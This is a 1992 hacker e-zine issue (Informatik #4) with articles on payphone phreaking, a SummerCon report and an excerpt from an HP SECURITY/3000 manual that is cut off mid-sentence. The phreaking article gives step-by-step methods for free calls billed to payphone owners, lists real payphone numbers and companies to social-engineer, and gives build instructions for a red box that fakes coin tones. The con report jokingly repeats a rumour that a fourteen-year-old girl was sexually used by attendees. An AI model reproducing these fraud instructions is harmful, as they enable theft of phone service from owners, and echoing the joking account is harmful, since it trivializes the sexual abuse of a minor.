About
Community
Bad Ideas
Drugs
Ego
Artistic Endeavors
But Can You Dance to It?
Cult of the Dead Cow
Literary Genius
Making Money
No Laughing Matter
On-Line 'Zines
Science Fiction
Self-Improvement
Erotica
Fringe
Society
Technology
register | bbs | search | rss | faq | about
meet up | add to del.icio.us | digg it

INFORMATIC MAGAZINE ISSUE #4

+=============================================================================+
| ## ## ## ###### ###### ###### ### ### ###### ###### ## ## ## |
| ## ### ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## |
| ## ## ### ##### ## ## ###### ## ## ###### ## ## #### |
| ## ## ## ## ###### ## ## ## ## ## ## ## ## ## ## |
+=============================================##==============================+
| July 08, 1992|
| [ The Journal of Privileged Information ] |
| |
+-----------------------------------------------------------------------------+
| Issue 04 By: 'Above the Law' |
+-----------------------------------------------------------------------------+
| |
|Informatik--Bringing you all the information you should know... |
| and a lot you shouldn't... |
| |
+=============================================================================+

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

*DISCLAIMER*
Informatik Journal is printed for informational purposes only. We
do not recommend or condone any illegal or fraudulent application of
the information found in this electronic magazine. As such, we
accept no liability for any criminal or civil disputes arising from
said information.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



===========================================
============== - CONTENTS - ===============
================ Issue 04 =================
======= Release date July 08, 1992 =====
===========================================

01) Issue #4 Introduction
By: Informatik Staff

02) COCOTS and the COMBO box
By: Count Zero

04) SummerCon 1992
By: Holistic Hacker

05) HP's SECURITY/3000 (part 2 of 3)
By: Sterling

06) The Demon Dialer
By: Vodka

07) The Kerberos Authentication System - An Intoduction
By: x0d

08) Computer Crime Investigation
By: C. D. Morgan

09) WAX or the Discovery of Televison Among the Bees
By: David Blair

10) Tid-Bytes--Misc Contributions
By: Informatik Staff

11) Submission, Subscription and Publication Information
By: Informatik Staff

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



/* Introduction */
By Mack Hammer



Welcome to Informatik Issue #4. Thanks to some submissions, we are able to
release this issue scarcely two months after issue 3. We hope to continue
providing the same informative and entertaing information that has marked the
last three issues. Keep those submissions coming!

This month we are focusing on hacking and phreaking, although we plan on
printing information on other high technology hacks in the future. We also
have an exceptionally interesting and useful article from C. D. Morgan about
computer crime investigation. In Tid-Bytes this issue, we have information
on the final run of the infamous LOD T-Shirts, and we have the fabulous
Spot-the-Fed Word Search, courtesty of the Informatik Staff.

For your enjoyment, we have included a report on Summercon by Holistic Hacker,
Informatik's reporter who was live on the scene. Unfortunately, neither of
the members of our illustrious editorial staff could make it to the Con this
year. Everyone I have spoken to has had nothing but raves for the Con, and it
seems to once again have been a success. I heard there were approximately
80 people there, although I can't be sure since I don't have a guest list. For
this, we have Knight Lightning to thank. In the best interests of Phrack
magazine, he has decided not to give us the guest list, and I hope to one day
have the opportunity to repay his generosity.

Once again, we appreciate your readership and hope you like the magazine.
We welcome any suggestions, comments and submissions. See the end of this
magazine for more information.

Enjoy,

Mack Hammer & Sterling
[Editors]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



COCOTS and COMBO-box
by Count Zero of Renegade Legion

Here's my phile on how to build a redbox. The file is ALSO about COCOTS...but
is has DETAILED plans for the COMBO-box COMBO-box = red box + clear box here it
is...enjoy!

R e n e g a d e L e g i o n
* * T e c h n i c a l R e p o r t s * *
* R * * L *
* *

Eastern Western
....
Net Runner ........ Echoman
The Knight ......... Sirus
Kingpin ... ....
Highlander ... ....
Count Zero .....
Iceberg ....
The Gypsy ....
Cursor ... ...
Rogue ... ...
White Knight .. ...
Nemesis ...

Presents

Report Number: 4.0

COCOTS: Uses for privatly operated public telephones. How to make free calls
use their maintenance features, and plans for a tone dialer to fool
COCOT security systems.

Author : Count Zero
Editor : Net Runner
System : COCOT Payphones
Uses : Free calling to most of the world
Dialups : One per payphone
Port : 300 bps, 7 bits, Even Pairity, 1 Stop Bit
Emulation: TTY
Thanks To: Count Zero for this extensive document.
Greets To: Magic Man, Darby, JT, Muppet, Madmike, Falcon, George Bush,
FBI Agent, Net Runner, Canine, Plutus, Midnight Mage, Yellow Jacket
Old Pink, The Knight, Spiritwalker

Renegade Legion Sites
---------------------
- tmp down - Night City < RL World HQ >
- private - Night Elite < ERL Headquarters >

Contact The Knight or Net Runner for the number to Night Elite

So you're walking down the street and you see a payphone gotta make an
important call, so you dig into your pocket to get a dime picking up the
handset, you suddenly notice that the payphone wants a QUARTER for a local
call! What the hell, and WHERE did this synthesized voice come from?

Let's make this phile short and to the point a COCOT is an acronym for
Customer Owned Coin Operated Telefone in other words, a COCOT is a fone OWNED
or RENTED by a PAYING CUSTOMER (most likely, a hotel or donut shop) a COCOT is
NOT a normal payfone the Telco doesn't own it, and the actual fone line is
usually a normal customer loop (unlike payfones, where the fone line is a
"special" payfone loop, allowing the use of "coin tones" to indicate money
dropped in more on this later) SO!..A COCOT may LOOK and SMELL like a telco
payphone, but it is NOT.

* Why do COCOTs exist?

Simple $$$$$$$! A customer owned payfone is money in the bank! You pay MORE
for local calls and long distance is typically handled by sleazy carriers that
offer bad/EXPENSIVE service the owner/renter of the COCOT opens the coinbox and
keeps the money him/herself! Also, a particularly SLEAZY quality of a COCOT is
the fact that it DOES NOT RECIEVE INCOMING CALLS this, of course, is because of
$$ if people are calling IN to a COCOT, the COCOT is not making money and
businesses always want to make as much $$ as possible...even if it hurts the
consumer (think about it..it REALLY sucks calling someone at home from a COCOT,
then not be able to have him/her call you back to save $$ "Guess I'll have to
keep feeding the COCOT quarters!")

* Where is a good place to look for COCOTs?

Outside Dunkin Donut shops, restaurants, clubs, bars, and outside/inside
hotels "convenient" locations

* How do I figure out if I have found a COCOT?

Simple a COCOT will have NO TELCO LOGOS on it no New England Telephone
symbols it may look just like a Telco fone chrome, with blue stickers and all
that ALSO a COCOT typically charges MORE for a local call than a regular Telco
payfone (in Massachusetts, local calls are a dime, in places like NYC, they are
25 cents.) a COCOT will most often have a synthesized voice that asks you to
"please deposit 25 cents" or whatever ALSO some FaNcY COCOTS will not look like
payfones at all some in hotels have weird LCD displays and look totally
different but the ALWAYS charge you more than a normal payphone.

* OK, I found this weird payphone in Boston that wants a quarter, and this
synthesized voice is harassing me when does the phun begin?

Soon..first of all, you must understand that the COCOT is a mimic.
Essentially, it wants you to think that it is just a plain ol' payfone pick up
the handset..hear that dialtone? hah! that dialtone is fake, synthesized by
the innards of the COCOT you are at the mercy of the COCOT. Remember a COCOT
runs off of a normal customer loop so unlike a Telco payphone where you must
deposit money to generate coin tones that are read by the CO, the security of a
COCOT depends solely on the COCOT fone itself its as if you took your own fone
and put a sign on it saying "Please put 10 cents in this jar for every call you
make." COCOTS are not naiive they won't let you near the unrestricted dialtone
until you fork over the cash-ola heh heh. Or so they THINK!

See, the Achilles heel of the COCOT is the FACT that ALL PAYFONES MUST LET
YOU MAKE 1-800 CALLS FOR FREE! It's not just a fact, it's the LAW so, now pick
up the handset again and place a 1-800 call any 1-800 number will do. When
they answer at the other end, just sit there do nothing ignore them. wait for
them to hang up the fone here's an example.

<DIAL 1-800-LOAN-YES>

<Ring, Ring>.....<click> "Hello, you wanna buy some money? Hello? HELLO?!"

<CLICK>

<You will now hear some static and probably a strange "waffling" noise, like
chh,chh,chh,chh,chh>

<CLICK>......DIALTONE!

NOW!.what have we got here? a dialtone? yes, you guessed it, the dialtone
you now hear is the UNRESTRICED dialtone of the COCOT's customer loop.

* So what?..So I got an "unrestricted dialtone"...big deal?

Meathead! with an UNRESTRICTED dialtone, all you need to do is place a call
via DTMF tones (the tones a touch-tone keypad generates) now, try dialing a
number with the COCOTs keypad WHOA! waitasec, no sound! this is a typical
lame attempt at protection by the COCOT. Just whip out your Radio Shack pocket
tone dialer, and try calling a number ANY number place it just as if you were
calling from a home phone call a 1-900 sex line call Guam you are FREE and the
COCOTs customer loop is being billed!

***NOTE: some COCOTS are more sophisticated at protecting themselves..some
will RESET when they hear the dialtone to get around this, make a loud hissing
sound with your mouth into the mouthpiece after the 1-800 number hangs up also,
get your tone dialer ready near the mouthpiece when u hear the dialtone,
quickly dial the first digit of your number to call if you hiss loudly enough,
you MAY be able to mask the sound of the dialtone and prevent the COCOT from
resetting and once you dial the first digit of the number you are calling, the
dialtone will disappear (naturally) ok, you can stop hissing like an idiot now
finish dialing your PHREE fone call.

Also, some COCOTs actually disable the handset after a call hangs up (in
other words, you can't send DTMF tones thru the mouthpiece) oh well, better
luck next time.

HOWEVER MOST of the COCOTs I have run across ONLY disable the DTMF keypad.. so
all you need is a pocket dialer to circumvent this!

OTHER THINGS TO KNOW: Sure, you can't call a COCOT, but it DOES have a number
to find out the COCOT's number, call 1-800-933-3258..this automated ANI service
will tell you the number you're dialing from now, try calling the COCOT from
another fone you will hear one of 2 things:

1) synthesized voice "Thank you"...CLICK..<hang up>
2) weird carrier

A COCOT's number is ONLY used by the company that BUILT the COCOT by calling up
a COCOT, a tech. can monitor its functioning, etc in case (1), you must enter
a 3 or 4 digit password and then you'll get into a voice menu driven program
that'll let you do "maintenance" stuff with the COCOT in case (2), you are
hooked to the COCOT's 300 bps modem (YES, a MODEM in a PAYFONE).. likewise, if
you can figure out the communication settings, you'll be into the COCOT's
maintenance routines.

Personally, I haven't had much luck (or patience) with calling up and hacking
COCOT maintenance functions. I just like making free fone calls from 'em!

COCOT ETIQUETTE:
Now, remember, you are making free fone calls but SOMEONE has to pay for
'em...and that is the OWNER the COCOT's customer loop is billed the cost of the
calls, and if the OWNER sees a big difference in the profits made on the COCOT
(profit=coins from COCOT - bill from Telco for customer loop)..they'll know
SOMETHING is up so moral is DON'T ABUSE THEM! don't call a 1-900 number and
stay on the line for 12 hours! If a COCOT is abused SEVERLY, an owner will
eventually LOSE money on the damn thing!, and that means BYE BYE COCOT also,
remember that a RECORD of ALL LONG DISTANCE calls is made to the COCOT's
customer loop..and COCOT companies will sometimes investigate "billing
discrepencies" so don't call anyone you personally know unless you are sure
they are "cool".

<RING RING> "Hello?"

"Hello...this is Cointel, Inc....we'd like to ask you a few
questions about a call you received from Boston on 2/12/91.
Could you tell us the name and address of the person who
placed the call?"

COOL dude -> "What?...I don't remember...go to hell! <SLAM>"
MEATHEAD -> "Uh, sure, his name is John Smith...you want his address too?"

Get the picture? Good...

COCOTs are a great resource if we use them wisely like our environment, we
gotta be careful not to plunder them make a few long distance calls and then
leave that particular COCOT alone for awhile chances are, your bills will be
"absorbed" by the profit margin of the owner and probably ignored but the
smaller the owner's profit margin gets,the more likely suspicions will be
aroused 'nuff said!

I have found COCOTs EVERYWHERE some of my personal favorites are on Route 1
North of Boston check out the Dunkin Donut shops and the Burger King also, in
front of the Rat in Kenmore look around they are lurking everywhere.
(BUT..COCOT technology is relatively new..don't expect them EVERYWHERE..I know
many towns that have NONE..check out big cities....) Here are some numbers of
COCOTs:
Kenmore Square,Boston,MA The Rat
617/247-8195
617/247-7913
617/247-8208
617/247-9437

Random ones: 617/720-4430 617/233-9872

Here are some companies that deal with COCOTs...try out your social
engineering skill on them:

Cointel, Inc. Int'l Telecharge, Inc.
130 Broadway St. P.O. Box 50579
Somerville, MA Dallas, TX
02145 1800/999-5152
1800/322-7741

As for a Tone Dialer, don't leave home without one!...a true phreak always has
a DTMF tone dialer at hand..along with a red box!....My personal favorite is
the COMBO-BOX (red box plus DTMF) take a Radio Shack 33-memory Pocket Dialer..
open up the back...remove the little 3.579 MHz crystal (looks like a metal
cylinder..unsolder it)...solder on a couple of thin, insulated wires where the
crystal was attached...thread the wires thru one of the "vents" in the back of
the tone dialer....get ahold of a 6.5536 MHz crystal (available thru Fry's
Electronics, 89 cents a piece, phone number 415/770-3763)..go out and get some
quick drying epoxy and a Radio Shack mini Toggle Switch, DPDT, cat. no 275-626

Close the tone dialer, with the two wires sticking out one of the back vents..
screw it up tight...now, attact the crystals and wires to the switch like this
with solder:
I^^^^^I
I xx <3.579 crystal>small one
I I
toggle switch -> oooooo X xxxxs <two wires>
I I
I xx <6.5536 crystal>big one
I I
^^^^^^

Each "xx" prong in the diagram is actually TWO prongs....hook up the two leads
from the crystals to separate prongs (same with the wires).

Now, epoxy this gizmo to the side of the tone dialer use ALOT of epoxy, as you
must make the switch/crystals essentially EMBEDDED in epoxy resin. like this:

Front View -> ----------------------
I I T <-toggle switch
I oo oo oo I---
I I |
I I---
I 1 2 3 I B s <-two crystals(b=big,s=small)
I I | in epoxy "blob"
I 4 5 6 I _
I I
I 7 8 9 I ^two wires running to back of unit
I I
I * 0 # I
I I
----------------------

----------------------
Back View -> I I
T I o ---- o-----------------------vent (1 of 4)
--- I / | I
s B I | | I
2 wires -> \-----o ---- o I
running into I I
vent I I
I I
I I
I I
----------------------

Make sure the epoxy is really gobbed on there..you want to be certaint the
switch and crystals are firmly attached and secure in a matrix of epoxy (it
doesn't conduct electricity, so don't worry about shorting out the connections
to the toggle switch)...just don't gum up the action of the switch!

Basically, you've altered the device so you can select between 2 crystals to
generate the timing for the microprocessor in the tone dialer...

Now turn on the tone dialer NOW, you can easily switch between the 2 crystal
types the small crystal will generate ordinary DTMF tones but, by simply
flicking the switch, you generate HIGHER tones now, using the memory function
of the tone dialer, save 5 "*" in the P1 location, now dial the P1 location
using the BIG crystal, sure sounds like the tones for a QUARTER, doesn't it!

Carry this around with you always will come in handy with both Telco payphones
AND COCOTs! no Phreak should be without one!

Anyway, that about wraps it up for me references for this article include Noah
Clayton's EXCELLENT article on COCOTs in 2600 Magazine, Autumn 1990.. also,
The Plague's article on Tone Dialer conversion to Red Box, 2600 Magazine,
Summer 1990 (Which inspired me to create the COMBO-BOX (red box PLUS DTMF
dialer)...I strongly urge people to subscribe to 2600 Magazine...call their
office line for more details ->516/751-2600... Remember..you can READ all you
want, but if you don't get your ASS out there and try stuff out for yourself,
you are nothing but a POSER!

Enough said...oh, also, I heard that SOME COCOTs have handsets in them that
can be accessed..in other words, you call the COCOT and if you hit "0" or
something else, the earpiece of the handset is activated and you can listen in
on what's goin on around the COCOT...I dunno...never worked for me, but try
these 2 "suspected" numbers...212/268-7538, -6129..try hitting "0" and listen
for any sounds...I could be wrong, I could be right..I could be black, I could
be white....

That's all folks remember, the purpose of this phile is to ENLIGHTEN, and I
in no way condone or encourage illegal activities...so don't blame me for ANY
MESS you get into this phile offered strictly as INFORMATIONAL ONLY! I am in
no way responsible for your ass! Also, I am not into wanton destruction,
vandalism, or fraud..seek the truth, and leave nothing but footsteps.

Remember...SHARE THE WEALTH...INFORMATION IS POWER...SHARE IT!

And drink massive amounts of Jolt cola...trust me, it's good for you.

Keep the faith, and never stop searching for new frontiers....

..................................

..oooOO Count Zero OOooo..

..................................

-----------------------------------------------------------------------------
EDITOR'S NOTE: (Renegade Legion)

We do NOT condone fraud, destruction of computer data or tangeble items.
We do not condone information hoarding, and accumulations stacks of informatio
n on individuals which corporations have no business accumulating. Companies
are free to give your information to other companies. And we feel vindicated
in examining the information about ourselves firsthand!

Down with buerocracy!

Hail Eris!
All Hail Discordia!

-Net Runner, Precentor of Renegade Legion

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -




SummerCon 1992
by Holistic Hacker

Phrack's SummerCon 1992 turned out great. Unforunately neither of our editors
could attend due to pesky problems like work, school, and an extreme lack of
cash. Never fear though, our on-the-spot reporter Holistic Hacker gives us the
low-down on this year's summer bash.

/*

From June 26 through June 28, the Executive International Inn in St.
Louis, MO, was overrun by the participants of SummerCon '92. This year's Con
was one of the largest in attendance - Knight Lightning estimates that over 75
people showed up for the activities this year.

Friday - June 26

Doc Cypher and I arrived around 4:30 PM and found the hotel already full
of action. The much-ballyhooed Phrack SummerCon t-shirts had already sold out
by the time we had arrived (although Dispater is making another print run of
them). Alcohol was already in presence, and people stood in the halls
acquainting themselves with one another.

Friday night was dominated by 'Batman Returns.' Many hackers went to see
the movie throughout the night, leaving pockets of other hackers scattered
around the hotel. Some people contented themselves by exploring the hotel, the
parking garage, and the adjoining Mark Twain Bank. After a brief trip to the
Radisson for the free buffet of mini tacos (umm-umm) and a stop by a local
liquor shop, the remaining hackers were ready to party. Led by the
always-partying Hunter, we staked out the pool as hacker turf. This is were we
found the infamous hacker groupies of SummerCon, but more about them later.

After bullshitting and drinking by the pool for a while, some peopl went
out trashing, others went to the bar, and some sat around talking about various
systems and hacks. Constant cries of 'Let's go get some women!' were heard
throughout the night.

The majority of the people at the hotel eventually made it to the RDT room
located at one end of the hotel. Everyone sat around and amused themselves
with the antics of the previously-mentioned Cyber Nymphs, a seventeen-year-old
and her fourteen-year-old-friend. The seventeen-year-old eventually
disappeared, never to be seen again, while the fourteen-year-old tried to hug
everyone who came near her. Rumor has it they were both done by several
hackers that night...

Around 2:00 AM, most people started to crash in preparation for the actual
conference on Saturday.

Saturday - June 27

Due to many late-risers and conflicting times, the conference was
rescheduled from 12 noon to 1:00 PM. About 60 hackers filled the conference
room on the second floor of the hotel. Sample copies of Cybertek and Security
Insider Report were available, as was an ad for Intertek. Copies of Erik
Bloodaxe's Computerworld article and a story from The Boston Business Journal
were present as well. Emmanuel Goldstein was present hawking back issues of
2600.

Knight Lightning started off the conference with the banging of a
linesman's set on the table. He expressed appreciation for the number of
people who showed up, roughly two or three times as many as had showed up at
past SummerCons. Rambone made a quick note of how the activites couldn't get
any worse than the previous night's, with much joking about the hacker chicks
coming from all. Dispater welcomed everyone to the Con. He also expressed his
gratitude for RDT's help wit Phrack over the last few months. Dispater then
made mention in passing that the government had recently purchased the hotel.
Buttons from RDT and h0d were mentioned, along with the Phrack SummerCon
t-shirts and the 2600 t-shirts.

Gatsby was the first speaker of the Con, discussing the San Diego
'1000-member hacker ring' that many people have heard tale in the last few
months. A hacker by the name of Prisoner from Long Island flew to San Diego to
see a girl, supposedly on a carded ticket. While there, he broke into a Zale's
jewelry store and pulled credit card info from their point-of-sales system. He
soon left his rented room, leaving behind the credit card printouts which his
landlord reported to the San Diego Police Department. He was soon met at the
Sleepy Time Motel in San Diego by the police. The FBI was soon brought into
the case, and he was kept at the Marriot Hotel for two weeks. While there, he
called several systems, including Scantronics. In the case of the
investigation, a guy going by The Crypt Keeper was intereviewed. When told by
Barry Sadler of the San Diego PD that he was interfering with the
investigation, he soon opened his mouth and used Gatsby's account to give the
feds info on Scantronics. Bufferings from Scantronics were used as probable
cause to get a search warrant for the board. Kludge now has a couple of
charges against him, thanks to the narc efforts of The Crypt Keeper.

Emmanuel Goldstein of 2600 Magazine was the next to speak. He related how
2600, in eight years of existence, had never been directly harassed by the
government. Emmanuel also mentioned how 2600 was in good legal shape since it
was a printed publication, unlike Phrack. He told us how 2600 is in need of
articles, and how 2600 will print anything leaked and/or sent to them.
Emmanuel mentioned that 2600 had never been sued, although they have been
threatened with legal action before. It was noted that 2600 currently has a
mailing list of 1500 members with newstand circulation of 3000. He talked a
little bit about how 2600 issues press releases and information in order to
alert people about unsecure systems, but that the information is never acted
upon until something happens. People would always blame the magazine for
giving the details on how to do something (such as opening Fed Ex drop boxes),
but never took action to correct the problem.

Ctrl-C was the next speaker of the Con. He discussed being caught by
Michigan Bell security and how he started working in security for Michigan
Bell. After some shake-ups in the management, the new manager fired Ctrl-C.
The Secret Service then decided to investigate and dragged him down to the
local office. A year-and-a-half later, he has not heard anything else from the
Secret Service and considers himself in the clear He doesn't do anything with
computers anymore, 'that's his story and he' sticking to it.'

Signal Surfer spoke next of some beta-test software that he had available
at the Con. It was a Usenet news reader 'easy enough for your mother' that was
being developed by the company he works for. He also talked about how hackers
are some of the best talent in the computer world and that they can make some
great employees. Signal Surfer said that he'd be happy to talk to anyone who
was interested in getting a legitimate job in the computer industry.

The sysop of Blitzkrieg BBS (sorry d00d, didn't catch yer name!) spoke
next about a friend and him getting busted for carding a laptop, and the
subsequent investigation. This is the same guy who also puts out the new
incarnation of TAP magazine. He related how the feds tried to pressure him
into giving them the subscriber's list. He also talked about how a portion of
his mail comes to him opened. Some great legal manueverings there. The feds
also tried to get him to turn narc on a computer fencing ring in the area. He
mentioned how he still has the TAP membership logs and everyone will get the
issues they have paid for.

The staff from Cybertek spoke next about the delays in the new issue of
their zine. They mentioned that they have more time to work on it now, and
that there will hopefully be no more delays in the publication of the new
issue.

Somewhere amidst all the talks, Agent Steal gave a very informative talk
about his dealings with Kevin Poulson, aka Dark Dante. If you weren't there,
you missed quite a story. Agent Steal related how Kevin was breaking into CO's
on an almost daily basis and some of the equipmen he had set up in his
apartment to prevent traces. He related how he is now out of prison and is
looking forward to something different. He may have been talking about the
Ozzy concert later that night...

Erik Bloodaxe took the podium next to talk about what happened to Comsec,
the MOD mess, and other topics in general. Doc Holiday spoke up occasionally
from his seat towards the back of the room. ErikB said that the main problem
Comsec faced was the debt they ran up trying to start the business. This was
mainly caused by one of their partners not putting up the money he promised and
not having many paying clients. Erik then explained how MOD affected Comsec
and the lives of some of his and Doc Holliday's family members. Erik also
related some documents he had brought with him, including the termination
letter of the president of Comsec and his article in a past Computerworld,
among other item. A debate then started over what a
'hacker-turned-businessman' can do when another hacker starts attacking them.
The debate over this and other topics lasted over half-an-hour until we moved
on to the final talk.

Drunkfux talked a bit about some of the shit that happened at the the
hotel after the last HoHoCon. Bascically, the management tried to charge him
for a hole knocked in a wall due to the conference room door being knocked into
it. After he refuted this charge, the hotel then had several holes knocked in
the walls of the conference room and tried to charge him for these as well.
They also complained about a mysterious fire which they could not locate. dFx
contacted a lawyer who soon had the hotel in his firm grip. A few days later,
the hotel sent two agents out to his house to apologize and give him some free
travel vouchers for the Hilton of his choice. With this, the official
conference was over and activities soon got underway again.

After the official conference talks, many people left the hotel to eat,
trash, or explore the city. Frosty and some of the other GCMS - MechWarriors
started a game of Hacker in the conference room. Many people soon made it over
to the Northwest Plaza, home of some of the shittiest dress codes in the
Midwest. About ten of us were sitting around when a security guard informed a
few of us that we couldn't wear our hats backwards and pointed out the cryptic
Rule 4 - 'All clothing must be worn in the way it was meant to be worn.' Go
figure - I always thought hats were worn on your head. After a bit of this,
Emmanuel Goldstein went to the local Sears store and bought a few of us St.
Louis baseball caps. With a few more backwards-hats, we strolled around the
mall, soon catching the eye of another always-alert security guard. After
telling us to turn our hats around and dropping her walkie-talkie trying to
call for backup, Emmanuel and a few of the guards began to discuss this Rule 4.
One of the guards mumbled about how a case about this matter has gone to
appellate court, but I haven't been able to find out anything certain of this.
After being told that this policy was in fact posted at all entrances, we were
kindly told to leave the store. On our walk around the mall, we saw the
mysterious rule board in two out of approximately 12 entrances. One more
thing, Rule 6 mentioned that there was to be no playing of cellular phones - I
think ErikB broke this rule when he played 'Mary Had a Little Lamb' on the
keypad of Signal Surfer's cellular phone. We then drove back to the Con and
related the story to the people we saw there.

With nightfall, the activites once again began to happen around the hotel.
Many trashing expeditions went out that night, some coming back with most el1te
info. We showed some videos in my room (and later Dispater's), including a
re-run of 'Rudolph the Heavy-Metal Reindeer,' some news programs, including the
'Unsolved Mysteries' report on Kevin Poulson, and a screening of 'ESS Phun,' a
trek inside a CO and the fun that can result. After 10:00 many people began to
split up. Doc Cypher and I took off to pick up my girlfriend from Illinois and
when we got back around 1:00, there had been some definite going-ons. We heard
reports about firecrackers being set off in the pool and a smoke bomb being set
off on the second floor of C-block. It was much later that John Frazel,
security guard supreme, began making his famous 'Get back in your rooms, or
you're going to jail' speech. Most people congregated in the hall near the RDT
room once again and engaged in swapping stories once again. Bags of discarded
trashing treasure started piling up in the stairwell as the night went on.
Hacking of various systems continued to take place in the so-called SummerCon
HQ.

Sunday - June 28

I took off again to Illinois about 4:30 in the morning, with most of the
hotel finally at rest. When I returned about 6:00, I returned to my room to
find all my stuff packed and Doc Cypher ready to get the hell out of there. A
report that there were '4000 cops' outside the hotel was floating around the
buildings. As we had planned to leave at 8:00 AM, this was no big deal for us.
After checking out and retrieving my VCR from Dispater, we left the hotel to
find no cops, just a few Navy officers scattered here and there. We then hit
the road and said goodbye to SummerCon '92.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -



:::::::::::::::::::::::::::::::::::::::::::::
:: HP's 'SECURITY/3000' System (part 2/3) ::
:: ::
:: by Sterling ::
:: ::
:::::::::::::::::::::::::::::::::::::::::::::

SECURITY/3000 is a third party security package for use on HP 3000 series
computers. It replaces several commands and bundles several utility programs
to monitor system security. HP's are quite a common site on X.25, so this may
add to your understanding of what's going on. Part 1 of this manual can be
found in Informatik #02. In this second section, I will discuss several of the
companion utilities that SECURITY/3000 uses to protect logins and passwords.

OBSOL - MPE passwords OBSOLESCENCE system
*****************************************

INTRODUCTION
~~~~~~~~~~~
A password is only as good as the people who are supposed to keep it secret.
The fact of the matter is that in most shops, MPE passwords get out "through
the grapevine" within a month or so at most. By the end of the month, the
passwords have to be changed to ensure security.

OBSOL, the Password Obsolescence System, guarantees that passwords are changed
frequently, and system security is thus maintained.

HOW OBSOL WORKS
~~~~~~~~~~~~~~
An Account Manager or the System Manager determines the number of days a given
password (user, group, or account) is valid before it must be changed (the
period called "obsolescence days"), and the number of days before the password
becomes obsolete that the user will be warned that the password will expire
(the period called "warning days").

Whenever a user logs on during a period when the password should be changed, he
is notified on what date the password will expire and then is allowed on the
system. If he logs on after the password has expired, he is disallowed access
to the system.

Every time an Account or System Manager changes a user, group, or account
password, he is prompted for the "obsolescence days" and "warning days" which
should be applied for that password, and the password obsolescence system is
updated automatically.

WHAT HAPPENS AT LOGON TIME
~~~~~~~~~~~~~~~~~~~~~~~~~
Whenever a user logs on during a period when either or both his user or account
passwords should be changed, he is notified that the password(s) will expire
and is then allowed on the system, as follows:

***********************************************************

Your xxxxxxxx password will expire on mm/dd/yy!

***********************************************************

where 'xxxxxxxx' is the type of password (user, group or account), 'mm/dd/yy'
is the obsolescence (expiration) date.

If a user logs on after the group or account password has expired, he is
disallowed access to the system and the following message is displayed:

***********************************************************

Your xxxxxxxx password has expired!

You will not be able to sign on until it is changed.

***********************************************************

where 'xxxxxxxx' is the type of password (user, group, account).

The password obsolescence system will not warn a user about the group password
if the group he is logging into is his home group--this is in keeping with MPE,
which does not prompt a user for his home group password, even if one exists.
By the same token, a user will not be disallowed access to a group, if that
group is his home group, even if the password has expired. In general, a user
will be warned to change only those passwords which he is prompted for at
logon.

OBSOL/PASCHG INTERFACE
~~~~~~~~~~~~~~~~~~~~~
OBSOL works well with PASCHG, the system which permits users to change their
own MPE user passwords, since with PASCHG the Account Manager is not burdened
with having to change dozens of passwords at the end of every month. In order
to provide additional ease in making certain that passwords are changed, OBSOL
may be configured to automatically run PASCHG during the password warning
period.

ACTIVATING OBSOL
~~~~~~~~~~~~~~~
The core of the password obsolescence system is two UDC files.

The first one is an option logon UDC which runs the program

OBSLOG.PUB.SECURITY

which checks whether any of the passwords of the user who is logging on are
obsolete.

The UDC is stored in the file OBSOLUDC.PUB.SECURITY

OBSLOGON
OPTION LOGON, NOBREAK
SETJCW SECURITYANSWER=0
RUN OBSLOG.PUB.SECURITY
IF SECURITYANSWER = 1 THEN
BYE
ENDIF

and should be set for a user, account, or the entire system; e.g. to set it
for the logon account, the Account Manager can do the following:

:SETCATALOG OBSOLUDC.PUB.SECURITY;ACCOUNT

It's recommend that the system manger set this UDC on an account-by-account
basis.

The second set of UDCs redefines all MPE :NEWUSER, :NEWGROUP, :NEWACCT,
:ALTUSER, :ALTGROUP, and :ALTACCT commands to run the program

OBSCHG.PUB.SECURITY

which updates the password obsolescence system whenever one of these commands
is executed.

These UDCs are stored in the file

OBSUDC.PUB.SECURITY

and are usually set systemwide so that all :ALTxxx and :NEWxxx commands are
redefined throughout the system. To do this, log on as MANAGER.SYS and execute
the command

:SETCATALOG OBSUDC.PUB.SECURITY,.. your UDCs...;SYSTEM

CONFIGURING OBSOL
~~~~~~~~~~~~~~~~
The default "obsolescence days" and "warning days" is set by declaring them in
the SECURITY/3000 configuration file

SECURMGR.PUB.SECURITY

as follows:

OBSDAYS=obsdays
WARNDAYS=warndays

where 'obsdays' is the number of days that a password is valid for before it is
obsoleted (default is '30') and 'warndays' is the number of days before a
password expiration is warned about.

EXCLUDING CERTAIN PASSWORDS FROM OBSOLESCENCE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
If you want to have some passwords expire automatically and others not, you can
accomplish this by declaring a long period of time (e.g. 1000 days) as the
"obsolescence days" for that password.

Only entities (users, groups, and accounts) in MPE which have passwords are
included in the password obsolescence system--those without MPE passwords are
not included in the internal data base when it is filled. In keeping with
this, when a password is removed from an entity in MPE, the entry corresponding
to that entity is removed from the data base. Similarly, when anDS; ADDING AND
ALTERING USERS, GROUPS, AND ACCOUNTS

When adding or altering users, groups, and accounts in OBSOL, the :NEWUSER,
:NEWGROUP, :NEWACCT, :ALTUSER, :ALTGROUP, and :ALTACCT commands are used as in
MPE, except the syntax is slightly different: the body of the command must be
enclosed in quotation marks, as in

:NEWUSER "CLERK;PASS=XYZZY;CAP=ND,SF,IA,BA"

and

:ALTACCT "DEV;PASS=FOO;CAP=AM,AL,GL,ND,SF,IA,BA,PH,DS"

These commands are redefined by UDCs to not only execute the command but, if
the command changes a password, to inform OBSOL that the password has been
changed and that it should be obsoleted when the "obsolescence days" have
passed. Therefore, it is not necessary to explicitly run a special program to
inform OBSOL every time a password is changed.

When you execute a :NEWxxx or :ALTxxx commmand, the command is processed
normally and you are prompted for "obsolete days" and "warning days" as
follows:

Password is currently obsoleted every od days; new value:

Where 'od' is the current "obsolescence days". Enter the new period for which
the password should be valid before it is obsoleted, or hit <return> to retain
the same value as before.

Warning period before obsolescence is wd days; new value:

Where 'wd' is the current "warning days". Enter the new number of days before
a password expires that the user should be warned to have the password changed,
or hit <return> to retain the same value as before.

So, for example, if you want to change the GAMES account password, and you want
the new password to be obsoleted every 2 months (60 days) and a warning message
